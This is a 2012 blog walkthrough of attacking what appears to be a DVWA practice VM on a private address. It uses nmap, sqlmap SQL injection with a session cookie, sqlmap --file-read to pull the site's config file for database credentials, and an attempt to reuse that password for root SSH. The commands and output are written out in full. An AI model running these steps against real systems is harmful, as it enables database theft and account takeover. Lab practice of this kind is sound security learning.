Tuesday, April 24, 2012

simple attack vector with Sqlmap --file-read, Dirbuster, and Nmap

hello guys, now i want to share hacking web in another attack vector.
i have a victim in address 192.168.56.101. i want to look the service has run, so i use nmap,
root@archaveliano:/home/localhost# nmap -sV 192.168.56.101

Starting Nmap 5.21 ( http://nmap.org ) at 2012-04-24 22:58 WIT
Nmap scan report for 192.168.56.101
Host is up (0.0016s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3p1 Debian 3ubuntu6 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.14 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 08:00:27:95:72:2B (Cadmus Computer Systems)
Service Info: OS: Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.70 seconds
root@archaveliano:/home/localhost# 


In there i find a from to input user ID, and try to enter mark " ' " in there. And i find error syntax like this "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1".

 it's time to work, i opened my sqlmap, and i type this "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" -p id --risk 3 --level 3 --thread 8 --dbms MySQL --dbs" the information is -u for the URL --cookie for cookie, because this web need to login inside, -p to parameter site vuln, --risk for risk to test the web (max=3) -- level of test the web (max=5), --thread for Max number of concurrent HTTP(s) requests (max=10). --dbms for Force back-end DBMS to this value, and --dbs for Enumerate DBMS databases. 

it's not a long time to wait, i can retrive the databases like this :
22:22:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[22:22:06] [INFO] fetching database names
[22:22:06] [INFO] the SQL query used returns 4 entries
[22:22:06] [INFO] starting 4 threads
[22:22:06] [INFO] retrieved: information_schema
[22:22:06] [INFO] retrieved: mysql
[22:22:06] [INFO] retrieved: fbip
[22:22:06] [INFO] retrieved: dvwa
available databases [4]:
[*] dvwa
[*] fbip
[*] information_schema
[*] mysql

now i have 4 databases. now i will to take over mysql database. and i enter this on sqlmap "./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" -p id --risk 3 --level 3 --thread 8 -D mysql --tables --dbs"
 but i have a problem, the problem like this 
[22:15:20] [WARNING] no column(s) found
[22:25:20] [WARNING] unable to enumerate the columns for table 'user' in database 'mysql'

i try to find another way, and i remember that sqlmap not only can take over the database, but it can read some file on site, now i will try it. but before i try, i should know, where the file that i need, so i must need dirbuster to find the file.
file that i need to be on /config/config.inc.php, so on sqlmap, i enter this :
"./sqlmap.py -u "http://192.168.56.101/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=medium; PHPSESSID=f7dn85m8g8ad502k9bl1mmonq3" --file-read "/var/www/config/config.inc.php" -v 1"and i take over web config:
it will save on web name/files :
now i know user and password mysql this web, i try to enter the user and password mysql but i find a problem again :
root@archaveliano:/home/localhost# mysql -h 192.168.56.101 -u root -p
Enter password: 
ERROR 1130 (HY000): Host '192.168.56.1' is not allowed to connect to this MySQL server

i try to enter ssh, because sometimes people get used to make the same password.
root@archaveliano:/home/localhost# ssh -l root 192.168.56.101

and this is the result :

it's very simple, right?!